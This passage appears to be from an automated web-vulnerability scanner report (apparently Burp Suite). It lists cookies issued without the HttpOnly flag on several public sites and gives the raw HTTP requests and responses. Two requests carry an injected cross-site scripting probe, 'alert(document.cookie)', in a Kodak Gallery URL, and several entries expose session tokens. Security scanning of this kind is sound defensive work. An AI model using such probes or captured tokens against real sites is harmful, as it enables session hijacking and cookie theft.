PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

14.245. https://www.vermontjoblink.com/ada/works/employeroverview.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/works/employeroverview.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ada/works/employeroverview.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:50 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

14.246. https://www.vermontjoblink.com/ada/works/joboverview.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/works/joboverview.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ada/works/joboverview.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:50 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

14.247. https://www.vermontjoblink.com/ada/works/jobsearch.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/works/jobsearch.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ada/works/jobsearch.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:49 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

14.248. https://www.vermontjoblink.com/ada/works/linkview.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/works/linkview.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ada/works/linkview.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:51 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
server-error: true
Content-Type: text/html; charset=UTF-8
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/

Bookmark Error <b>You may be seeing this error as a result of bookmarking this page. Unfortunately, our site design will not allow the bookmarking of most internal pages.</b> If you wish to contact th
...[SNIP]...

14.249. https://www.vermontjoblink.com/ada/works/resourcesoverview.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/works/resourcesoverview.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ada/works/resourcesoverview.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:50 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

14.250. https://www.vermontjoblink.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 29 Apr 2011 21:07:34 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
location: /ada/404/404_qry.cfm
Content-Type: text/html; charset=UTF-8

<!-- vermontjoblink --><!-- vjlpub --><!-- App list: (vjlpub) --><!-- Load Balancing is Off -->

14.251. http://www.visitflorida.com/floridalive  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.visitflorida.com
Path:   /floridalive

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /floridalive HTTP/1.1
Host: www.visitflorida.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:02:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.4
Set-Cookie: PHPSESSID=nf9dmcfmtuh81gq8ojaulkllo7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 465042


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...

14.252. http://www.vsea.org/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.vsea.org
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.vsea.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:12:49 GMT
Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: SESSc2e79101469fa43c6bcc78e0ec8b2f81=a33741c30c60faca76c77b41e704af54; expires=Mon, 23 May 2011 01:46:09 GMT; path=/; domain=.vsea.org
Last-Modified: Fri, 29 Apr 2011 22:12:49 GMT
Vary: User-Agent,Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 45383

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

   <head>
   <title>Ver
...[SNIP]...

14.253. http://www.webtools.ca.gov/javascript/shared/weather2/weather3.js.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.webtools.ca.gov
Path:   /javascript/shared/weather2/weather3.js.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /javascript/shared/weather2/weather3.js.asp HTTP/1.1
Host: www.webtools.ca.gov
Proxy-Connection: keep-alive
Referer: http://ca.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 22:09:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1450
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCDBDARD=FEDLIDLBJBOJNPACINDMDKJL; path=/
Cache-control: private


document.write('    <div id="weather_container">');
document.write('        <img src="/images/common/weather/partly_cloudy.png" alt="Partly Cloudy" title="Partly Cloudy" class="weather_icon" />');
docu
...[SNIP]...

14.254. http://a.triggit.com/px  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.triggit.com
Path:   /px

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /px?nosync=1&hn=www.kodakgallery.com&cs=ISO-8859-1&ss=1920x1200&cd=16-bit&lg=en-US&je=1&ti=VisitFlorida%20Vacation%20Photos%20at%20KODAK%20Gallery&rf=http%3A%2F%2Fburp%2Fshow%2F43&ur=http%3A%2F%2Fwww.kodakgallery.com%2Fgallery%2Flp%2F2010%2Fvisit_florida%2Fvacation_photos.jsp%3Fe81c7*%2Falert(document.cookie)%2F%2F4c687dfaa6f%3D1&pl=Win32&ua=Mozilla%2F5.0%20(Windows%20NT%206.1%3B%20WOW64)%20AppleWebKit%2F534.24%20(KHTML%2C%20like%20Gecko)%20Chrome%2F11.0.696.60%20Safari%2F534.24&cb=0.7124078529886901&u=kodak&rtv=1215451620&rtv=Anon&rtv=landing%20page%2Cvisit%20florida HTTP/1.1
Host: a.triggit.com
Proxy-Connection: keep-alive
Referer: http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp?e81c7*/alert(document.cookie)//4c687dfaa6f=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trgu=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; trgjs=1

Response

HTTP/1.1 200 OK
Set-Cookie: trgs=320740595; domain=.triggit.com; path=/;
Content-Type: image/gif
P3P: CP="DEVo PSDo OUR BUS DSP ALL COR"
Date: Sat, 30 Apr 2011 15:08:24 GMT
Content-Length: 43

GIF89a.............!.......,...........L..;

14.255. http://ad.yieldmanager.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=851938&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp?e81c7*/alert(document.cookie)//4c687dfaa6f=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; pv1="b!!!!$!#M*E!,Y+@!$Xwq!/h[p!%:3<!!!!$!?5%!(/4f4!w1K*!%4fo!'i8L!'>d6~~~~~<vl)[<wjgu~!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~"; ih="b!!!!2!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!/Iw4!!!!#<wF]1!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1`)_!!!!#<wYiT"; bh="b!!!$7!!!?H!!!!%<wR0_!!-?2!!!!#<xG3/!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!#<xG3/!!0P,!!!!#<x4hf!!1Mv!!!!#<waw+!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!J<=!!!!)<wYiT!!J<E!!!!)<wYiT!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!'<xG3/!!PL`!!!!#<x@jG!!RZ(!!!!$<xD>X!!VQ(!!!!#<wYkr!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!*<wYiT!!q:E!!!!'<wYiT!!q<+!!!!(<wYiT!!q</!!!!(<wYiT!!q<3!!!!(<wYiT!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tjQ!!!!$<xG3/!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!'<xD>X!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2Rn!!!!#<x2wq!#2YX!!!!#<vl)_!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#4`K!!!!#<x2wq!#5(U!!!!#<x,:<!#5(V!!!!#<x31-!#5(W!!!!#<x3.t!#5